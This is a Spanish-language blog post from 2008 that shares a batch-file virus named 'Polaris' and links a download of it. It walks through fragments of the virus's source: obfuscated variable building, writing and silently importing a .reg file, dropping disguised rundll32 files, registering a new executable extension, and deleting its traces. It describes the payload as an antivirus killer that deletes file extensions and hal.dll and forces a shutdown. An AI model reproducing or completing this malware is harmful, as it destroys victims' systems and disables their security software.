[ 3 en raya creado por El-H ] en Batch !!
15 noviembre 2008
Polaris.. virus en batch
Es una version actualizada de un virus que se llama polaris! ,la tengo de hace tiempo pero olvide postearla aca :P
--------------------------------------------
aqui tienen la descarga del virus!
http://el-juacker.webcindario.com/descargas/bomba%20www.el-juacker.com.ar.zip
---------------------------------------------
Info de los comandos utilizados:
Todos sabemos que hace set y @echo off
(set define variables y echo off desactiva el eco,le ponen generalmente una @ antes ya que es mas comodo q escribir echo off>nul)
set g=abcdefghijklmnopqrstuvwxyz.\/-
set h=g:~4,1
call set h=%%%h%%%
En este ejemplo explico la parte en que definimos variables con un valor de un caracter que este dentro de otra variable.
set g=abcdefghijklmnopqrstuvwxyz.\/- (Caracteres)
set h=g:~4,1 (h=al 4 caracter de g)
call set h=%%%h%%% (le asignamos el valor)
Aca escribimos los archivos : 1.reg ,rundll32.bat y rundll32.com
call:w98 > "1.reg"
call:polaris > "%e%.bat"
call:run > "%e%.com"
Como en la etiqueta "w98 , polaris o run" todas comienzan con "echo " (en este caso usamos una variable con este valor "%a%" con call vamos a esta etiqueta y redireccionamos lo que debería aparecen en pantalla a un archivo.
1.exe
regedit /s 1.reg
%f%1.reg > nul
%f%%e%.com > nul
%Ax%%AzA%%z%fi%j%%h%> nul
Ejecutamos el archivo 1.exe que se extrae de RunDll32.com,sólo con el nombre ya que está en el mismo directorio que el bat.
Agregamos a 1.reg al registro.
Borramos a 1.reg ,Rundll32.com
asociamos la extencion .sonne como ejecutable.
La etiqueta "run" es un ejecutable encriptado con netsend que abre bat sin mostrar el interprete de comandos.
Polaris es un avkiller que se escribe en system32 que finaliza borrando extenciones y un shutdown(tambien borra la hal.dll)
w98 es un exploit para ejecutar una nueva extencion como ejecutable....
Saludos
0 comentarios:
Publicar un comentario